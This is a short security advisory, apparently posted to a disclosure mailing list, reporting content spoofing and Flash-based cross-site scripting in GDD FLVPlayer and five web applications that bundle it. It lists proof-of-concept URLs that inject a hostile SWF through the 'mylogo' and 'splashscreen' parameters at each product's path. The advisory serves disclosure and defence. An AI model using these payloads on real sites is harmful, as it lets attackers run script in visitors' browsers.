Hello 3APA3A!
These are Content Spoofing and Cross-Site Scripting vulnerabilities in multiple web applications with GDD FLVPlayer. Earlier I've wrote about vulnerabilities in GDD FLVPlayer (http://seclists.org/fulldisclosure/2013/Aug/247). This is video and audio player, which is used at thousands web sites and in multiple web applications.
Among them are Order Master Pro, CMS Pask (Pixelwerk admin), gddflvplayer for MODx, Pixelfind Administrator, WHMCompleteSolution. And other web applications. Also this flash video and audio player is used at many web sites as standalone web application.
Vulnerable are web applications which are using GDD FLVPlayer v3.635 and previous versions.
Vulnerable are the next web applications:
Order Master Pro (all versions)
CMS Pask 3 (Pixelwerk admin v.3.3) and previous versions.
gddflvplayer for MODx (all versions).
Pixelfind Administrator (all versions).
WHMCompleteSolution (all versions).
GDD FLVPlayer was developed by GeDeDe.
GeDeDe
http://www.gdd.ro
XSS (via Flash Injection) (WASC-08):
Order Master Pro:
http://site/op/video/gddflvplayer.swf?mylogo=xss.swf
http://site/op/video/gddflvplayer.swf?splashscreen=xss.swf
CMS Pask 3 (Pixelwerk admin):
http://site/gddflvplayer.swf?mylogo=xss.swf
http://site/gddflvplayer.swf?splashscreen=xss.swf
gddflvplayer for MODx:
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?mylogo=xss.swf
http://site/assets/snippets/gddflvplayer/gddflvplayer.swf?splashscreen=xss.swf
Pixelfind Administrator:
http://site/includes/flash/gddflvplayer.swf?mylogo=xss.swf
http://site/includes/flash/gddflvplayer.swf?splashscreen=xss.swf
WHMCompleteSolution:
http://site/player/gddflvplayer.swf?mylogo=xss.swf
http://site/player/gddflvplayer.swf?splashscreen=xss.swf
These are examples of XSS vulnerabilities, examples of 8 ะกS vulnerabilities see in above-mentioned advisory.
I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/6727/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua